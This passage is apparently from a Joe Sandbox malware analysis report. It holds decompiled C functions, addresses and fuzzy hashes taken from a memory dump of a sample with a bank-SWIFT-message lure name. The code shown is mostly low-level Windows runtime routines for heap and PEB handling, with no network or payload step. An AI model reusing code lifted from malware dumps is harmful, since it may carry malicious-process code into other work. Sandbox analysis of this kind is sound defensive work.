                                                                    				intOrPtr _v12;
                                                                    				short _v38;
                                                                    				char _v44;
                                                                    				signed char* _t11;
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr _t22;
                                                                    				intOrPtr _t23;
                                                                    				intOrPtr _t24;
                                                                    				signed int _t25;
                                                                    
                                                                    				_v8 =  *0x198d360 ^ _t25;
                                                                    				_v12 = __ecx;
                                                                    				_v38 = 0x1c2d;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t11 = 0x7ffe0386;
                                                                    				} else {
                                                                    					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    				}
                                                                    				_push( &_v44);
                                                                    				_push(0xffffffe4);
                                                                    				_push(0x402);
                                                                    				_push( *_t11 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                    			}













                                                                    0x01968ce5
                                                                    0x01968ced
                                                                    0x01968cf0
                                                                    0x01968cfb
                                                                    0x01968d0d
                                                                    0x01968cfd
                                                                    0x01968d06
                                                                    0x01968d06
                                                                    0x01968d18
                                                                    0x01968d19
                                                                    0x01968d1b
                                                                    0x01968d20
                                                                    0x01968d33

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1e0ec3b431ea438b4a8ed25b96cbf5235a0e5c0772b17c0123a2f814b764c5bc
                                                                    • Instruction ID: b3ea760db3655fc0a1779aa32e8e2abc02b4fa65b6073d912e2ef5450eeeb3ed
                                                                    • Opcode Fuzzy Hash: 1e0ec3b431ea438b4a8ed25b96cbf5235a0e5c0772b17c0123a2f814b764c5bc
                                                                    • Instruction Fuzzy Hash: ABF0E270A04309ABCB04DBACE845EAE77B8EF29304F100199E905EB3C0EA34DA00C765
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 88%
                                                                    			E018B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                                    				signed int _t8;
                                                                    				void* _t10;
                                                                    				short* _t17;
                                                                    				void* _t19;
                                                                    				intOrPtr _t20;
                                                                    				void* _t21;
                                                                    
                                                                    				_t20 = __esi;
                                                                    				_t19 = __edi;
                                                                    				_t17 = __ebx;
                                                                    				if( *((char*)(_t21 - 0x25)) != 0) {
                                                                    					if(__ecx == 0) {
                                                                    						E018AEB70(__ecx, 0x19879a0);
                                                                    					} else {
                                                                    						asm("lock xadd [ecx], eax");
                                                                    						if((_t8 | 0xffffffff) == 0) {
                                                                    							_push( *((intOrPtr*)(__ecx + 4)));
                                                                    							E018D95D0();
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                                    							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                                    							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                                    						}
                                                                    					}
                                                                    					L10:
                                                                    				}
                                                                    				_t10 = _t19 + _t19;
                                                                    				if(_t20 >= _t10) {
                                                                    					if(_t19 != 0) {
                                                                    						 *_t17 = 0;
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    				return _t10;
                                                                    				goto L10;
                                                                    			}









                                                                    0x018b746d
                                                                    0x018b746d
                                                                    0x018b746d
                                                                    0x018b7471
                                                                    0x018b7488
                                                                    0x018ff92d
                                                                    0x018b748e
                                                                    0x018b7491
                                                                    0x018b7495
                                                                    0x018ff937
                                                                    0x018ff93a
                                                                    0x018ff94e
                                                                    0x018ff953
                                                                    0x018ff956
                                                                    0x018ff956
                                                                    0x018b7495
                                                                    0x00000000
                                                                    0x018b7488
                                                                    0x018b7473
                                                                    0x018b7478
                                                                    0x018b747d
                                                                    0x018b7481
                                                                    0x00000000
                                                                    0x018b7481
                                                                    0x018b747d
                                                                    0x018b747a
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ddaa7f4364f3fbf02cf997a1fe39c61d2d68cfa6b7aaa55b52b3bc0224f0bfa7
                                                                    • Instruction ID: c7e19b50a77c8be3263083625df76c7296fed0675194f6280c6b63d3daa0dae2
                                                                    • Opcode Fuzzy Hash: ddaa7f4364f3fbf02cf997a1fe39c61d2d68cfa6b7aaa55b52b3bc0224f0bfa7
                                                                    • Instruction Fuzzy Hash: A9F0B435A04349AADF02976CC8C0BF9BF71AF84315F440259D551EB2D1E7699A018796
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E01894F2E(void* __ecx, char _a4) {
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				void* _t17;
                                                                    				void* _t19;
                                                                    				void* _t20;
                                                                    				void* _t21;
                                                                    
                                                                    				_t18 = __ecx;
                                                                    				_t21 = __ecx;
                                                                    				if(__ecx == 0) {
                                                                    					L6:
                                                                    					__eflags = _a4;
                                                                    					if(__eflags != 0) {
                                                                    						L8:
                                                                    						E019688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                    						L9:
                                                                    						return 0;
                                                                    					}
                                                                    					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                    					if(__eflags != 0) {
                                                                    						goto L9;
                                                                    					}
                                                                    					goto L8;
                                                                    				}
                                                                    				_t18 = __ecx + 0x30;
                                                                    				if(E018BC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1871030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                    					goto L6;
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}









                                                                    0x01894f2e
                                                                    0x01894f34
                                                                    0x01894f38
                                                                    0x018f0b85
                                                                    0x018f0b85
                                                                    0x018f0b89
                                                                    0x018f0b9a
                                                                    0x018f0b9a
                                                                    0x018f0b9f
                                                                    0x00000000
                                                                    0x018f0b9f
                                                                    0x018f0b94
                                                                    0x018f0b98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f0b98
                                                                    0x01894f3e
                                                                    0x01894f48
                                                                    0x00000000
                                                                    0x01894f6e
                                                                    0x00000000
                                                                    0x01894f70

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7b0e05f860fb0d0dfa1bc27fdc9fd8af07dc257f4f73cc2fbaa3a2db3dc86a3a
                                                                    • Instruction ID: 95d1ebe6376193b2621b359edd6232ca0966f9913a8fa2eb4967019b13c8e18b
                                                                    • Opcode Fuzzy Hash: 7b0e05f860fb0d0dfa1bc27fdc9fd8af07dc257f4f73cc2fbaa3a2db3dc86a3a
                                                                    • Instruction Fuzzy Hash: 15F0E23252978D8FDB72CB5CC184B22B7DAAB007B8F244468E605C7A23C724EE45C640
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 36%
                                                                    			E01968B58(intOrPtr __ecx) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v20;
                                                                    				short _v46;
                                                                    				char _v52;
                                                                    				signed char* _t11;
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr _t22;
                                                                    				intOrPtr _t23;
                                                                    				intOrPtr _t24;
                                                                    				signed int _t25;
                                                                    
                                                                    				_v8 =  *0x198d360 ^ _t25;
                                                                    				_v20 = __ecx;
                                                                    				_v46 = 0x1c26;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t11 = 0x7ffe0386;
                                                                    				} else {
                                                                    					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    				}
                                                                    				_push( &_v52);
                                                                    				_push(4);
                                                                    				_push(0x402);
                                                                    				_push( *_t11 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                    			}













                                                                    0x01968b67
                                                                    0x01968b6f
                                                                    0x01968b72
                                                                    0x01968b7d
                                                                    0x01968b8f
                                                                    0x01968b7f
                                                                    0x01968b88
                                                                    0x01968b88
                                                                    0x01968b9a
                                                                    0x01968b9b
                                                                    0x01968b9d
                                                                    0x01968ba2
                                                                    0x01968bb5

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bdc2c7d9750c8463c3b3327320855a4481ef535140c6fe97474c31b2771ec676
                                                                    • Instruction ID: e31779c7ba047597e8d278f3424ffdeb79b854ccec233663c507ac28bb940b7a
                                                                    • Opcode Fuzzy Hash: bdc2c7d9750c8463c3b3327320855a4481ef535140c6fe97474c31b2771ec676
                                                                    • Instruction Fuzzy Hash: 3CF082B1A04359ABDB14EBBCE906E7E77B8EF04304F040459BA05DB3C0EA74DA00C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018CA44B(signed int __ecx) {
                                                                    				intOrPtr _t13;
                                                                    				signed int _t15;
                                                                    				signed int* _t16;
                                                                    				signed int* _t17;
                                                                    
                                                                    				_t13 =  *0x1987b9c; // 0x0
                                                                    				_t15 = __ecx;
                                                                    				_t16 = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                                    				if(_t16 == 0) {
                                                                    					return 0;
                                                                    				}
                                                                    				 *_t16 = _t15;
                                                                    				_t17 =  &(_t16[2]);
                                                                    				E018DFA60(_t17, 0, _t15 << 2);
                                                                    				return _t17;
                                                                    			}







                                                                    0x018ca44b
                                                                    0x018ca453
                                                                    0x018ca472
                                                                    0x018ca476
                                                                    0x00000000
                                                                    0x018ca493
                                                                    0x018ca47a
                                                                    0x018ca47f
                                                                    0x018ca486
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18064d3aa3a6d5206b28110664e2898687066287943adeae7a96f6f046671021
                                                                    • Instruction ID: cf3e540ce07b399162cc20834a9f67dba6e3ca2c86e386ec80356c9bb944afde
                                                                    • Opcode Fuzzy Hash: 18064d3aa3a6d5206b28110664e2898687066287943adeae7a96f6f046671021
                                                                    • Instruction Fuzzy Hash: 0CE09272A01425ABD2215E58EC40F6AB39EDBE5B55F194039E605E7214E628DE02C7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E0189F358(void* __ecx, signed int __edx) {
                                                                    				char _v8;
                                                                    				signed int _t9;
                                                                    				void* _t20;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_t9 = 2;
                                                                    				_t20 = 0;
                                                                    				if(E018CF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                                    					_t20 = L018B4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                    				}
                                                                    				return _t20;
                                                                    			}






                                                                    0x0189f35d
                                                                    0x0189f361
                                                                    0x0189f367
                                                                    0x0189f372
                                                                    0x0189f38c
                                                                    0x0189f38c
                                                                    0x0189f394

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                    • Instruction ID: 80253be6fefa8f17d58aa769d08d09faaf31f92c84464b2e03e6703f64b0f8ca
                                                                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                    • Instruction Fuzzy Hash: 70E0DF32A40118FBEB21AADD9E06FAABFADDB58B60F040195BB04D7150D5749F00D2D1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018AFF60(intOrPtr _a4) {
                                                                    				void* __ecx;
                                                                    				void* __ebp;
                                                                    				void* _t13;
                                                                    				intOrPtr _t14;
                                                                    				void* _t15;
                                                                    				void* _t16;
                                                                    				void* _t17;
                                                                    
                                                                    				_t14 = _a4;
                                                                    				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x18711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                    					return E019688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                                    				} else {
                                                                    					return E018B0050(_t14);
                                                                    				}
                                                                    			}










                                                                    0x018aff66
                                                                    0x018aff6b
                                                                    0x00000000
                                                                    0x018aff8f
                                                                    0x00000000
                                                                    0x018aff8f

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3722f8c5f0f8c7093f488f14727826c02b035405f8e6ddb54edcefd5ffe12ccc
                                                                    • Instruction ID: 40c8e2252c1fb08c1e2b79ea2307a4af854bb948bcfc1a2cd270e20258708865
                                                                    • Opcode Fuzzy Hash: 3722f8c5f0f8c7093f488f14727826c02b035405f8e6ddb54edcefd5ffe12ccc
                                                                    • Instruction Fuzzy Hash: 6FE0DFB0205B049FF735DB59E0C0F2D3BAC9B52721F59801DE208CB502CE21EA81C296
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 82%
                                                                    			E019241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t5;
                                                                    				void* _t14;
                                                                    
                                                                    				_push(8);
                                                                    				_push(0x19708f0);
                                                                    				_t5 = E018ED08C(__ebx, __edi, __esi);
                                                                    				if( *0x19887ec == 0) {
                                                                    					E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                    					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                                    					if( *0x19887ec == 0) {
                                                                    						 *0x19887f0 = 0x19887ec;
                                                                    						 *0x19887ec = 0x19887ec;
                                                                    						 *0x19887e8 = 0x19887e4;
                                                                    						 *0x19887e4 = 0x19887e4;
                                                                    					}
                                                                    					 *(_t14 - 4) = 0xfffffffe;
                                                                    					_t5 = L01924248();
                                                                    				}
                                                                    				return E018ED0D1(_t5);
                                                                    			}





                                                                    0x019241e8
                                                                    0x019241ea
                                                                    0x019241ef
                                                                    0x019241fb
                                                                    0x01924206
                                                                    0x0192420b
                                                                    0x01924216
                                                                    0x0192421d
                                                                    0x01924222
                                                                    0x0192422c
                                                                    0x01924231
                                                                    0x01924231
                                                                    0x01924236
                                                                    0x0192423d
                                                                    0x0192423d
                                                                    0x01924247

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 646cde79d987e3b5747dc2a5a3c4dcd9d4e81b5d50219ddfa28a5efe37fbc982
                                                                    • Instruction ID: 74861abfbe176988fad0573b382b008ad2878969feed6805b5e068bc76e8b4a0
                                                                    • Opcode Fuzzy Hash: 646cde79d987e3b5747dc2a5a3c4dcd9d4e81b5d50219ddfa28a5efe37fbc982
                                                                    • Instruction Fuzzy Hash: 12F01578854701CFDBB0FFAA95047183AF4F795B21F80411AD10887A8CC77485A8CF22
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0194D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                    				void* _t5;
                                                                    
                                                                    				if(_a4 != 0) {
                                                                    					_t5 = L0189E8B0(__ecx, _a4, 0xfff);
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                    					return _t5;
                                                                    				}
                                                                    				return 0xc000000d;
                                                                    			}




                                                                    0x0194d38a
                                                                    0x0194d39b
                                                                    0x0194d3b1
                                                                    0x00000000
                                                                    0x0194d3b6
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                    • Instruction ID: 4c90ffec8aaa1dd028bdeee2fc2a46a71f68f7f03536ecb1abdcba973120db1a
                                                                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                    • Instruction Fuzzy Hash: 30E0C235280249FBDF225E88CC00FA97B5ADBA07A5F104031FE08AE7A1C6719D91D6C4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018CA185() {
                                                                    				void* __ecx;
                                                                    				intOrPtr* _t5;
                                                                    
                                                                    				if( *0x19867e4 >= 0xa) {
                                                                    					if(_t5 < 0x1986800 || _t5 >= 0x1986900) {
                                                                    						return L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                    					} else {
                                                                    						goto L1;
                                                                    					}
                                                                    				} else {
                                                                    					L1:
                                                                    					return E018B0010(0x19867e0, _t5);
                                                                    				}
                                                                    			}





                                                                    0x018ca190
                                                                    0x018ca1a6
                                                                    0x018ca1c2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ca192
                                                                    0x018ca192
                                                                    0x018ca19f
                                                                    0x018ca19f

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 149b876e5829775546513ba03851d333d703d55ca8658fc35f5c5e6598743135
                                                                    • Instruction ID: 5657000c84fad8176c77f783e5094576298da43d5edae2f02613bf0bd0b954c9
                                                                    • Opcode Fuzzy Hash: 149b876e5829775546513ba03851d333d703d55ca8658fc35f5c5e6598743135
                                                                    • Instruction Fuzzy Hash: 13D02EB11206085AC72D33149894B2632A2F7C0F60F34480EF20BCFAE0FA70CED0A24E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018C16E0(void* __edx, void* __eflags) {
                                                                    				void* __ecx;
                                                                    				void* _t3;
                                                                    
                                                                    				_t3 = E018C1710(0x19867e0);
                                                                    				if(_t3 == 0) {
                                                                    					_t6 =  *[fs:0x30];
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                                    						goto L1;
                                                                    					} else {
                                                                    						return L018B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                                    					}
                                                                    				} else {
                                                                    					L1:
                                                                    					return _t3;
                                                                    				}
                                                                    			}





                                                                    0x018c16e8
                                                                    0x018c16ef
                                                                    0x018c16f3
                                                                    0x018c16fe
                                                                    0x00000000
                                                                    0x018c1700
                                                                    0x018c170d
                                                                    0x018c170d
                                                                    0x018c16f2
                                                                    0x018c16f2
                                                                    0x018c16f2
                                                                    0x018c16f2

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55de7762d94b567c54969f801b8b52eb9eb59b280af6b4241792b112a42f5c48
                                                                    • Instruction ID: 885d705e536638202c6d774d053e38ea0d93f33679019c86214f7897a08eb86c
                                                                    • Opcode Fuzzy Hash: 55de7762d94b567c54969f801b8b52eb9eb59b280af6b4241792b112a42f5c48
                                                                    • Instruction Fuzzy Hash: 42D0A731110201D2EA2D6B18988CF143651EB90F81F38005CF20BC94C2CFB0CE92E048
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E019153CA(void* __ebx) {
                                                                    				intOrPtr _t7;
                                                                    				void* _t13;
                                                                    				void* _t14;
                                                                    				intOrPtr _t15;
                                                                    				void* _t16;
                                                                    
                                                                    				_t13 = __ebx;
                                                                    				if( *((char*)(_t16 - 0x65)) != 0) {
                                                                    					E018AEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                    					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                                    					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                                    				}
                                                                    				if(_t15 != 0) {
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                                    					return  *((intOrPtr*)(_t16 - 0x64));
                                                                    				}
                                                                    				return _t7;
                                                                    			}








                                                                    0x019153ca
                                                                    0x019153ce
                                                                    0x019153d9
                                                                    0x019153de
                                                                    0x019153e1
                                                                    0x019153e1
                                                                    0x019153e6
                                                                    0x019153f3
                                                                    0x00000000
                                                                    0x019153f8
                                                                    0x019153fb

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                    • Instruction ID: 0d85756d63b43d08955d1d860f66fd0b409be13f80a804321095433c3c6f08a7
                                                                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                    • Instruction Fuzzy Hash: F1E08C31900788DBEF12DB4CCA90F4EBBF9FB85B00F160404A008AF660C624AD01CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018C35A1(void* __eax, void* __ebx, void* __ecx) {
                                                                    				void* _t6;
                                                                    				void* _t10;
                                                                    				void* _t11;
                                                                    
                                                                    				_t10 = __ecx;
                                                                    				_t6 = __eax;
                                                                    				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                                    					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                                    				}
                                                                    				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                                    					return E018AEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                    				}
                                                                    				return _t6;
                                                                    			}






                                                                    0x018c35a1
                                                                    0x018c35a1
                                                                    0x018c35a5
                                                                    0x018c35ab
                                                                    0x018c35ab
                                                                    0x018c35b5
                                                                    0x00000000
                                                                    0x018c35c1
                                                                    0x018c35b7

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                    • Instruction ID: 4e6f8b240126c81be792f35cebdb0f76b89d8ca6945fb08ec843053e455e0f6b
                                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                    • Instruction Fuzzy Hash: C7D0A731401185BEEB01AF18C1187683771BB20B0CF58605DA80185452C335CB0BC601
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018AAAB0() {
                                                                    				intOrPtr* _t4;
                                                                    
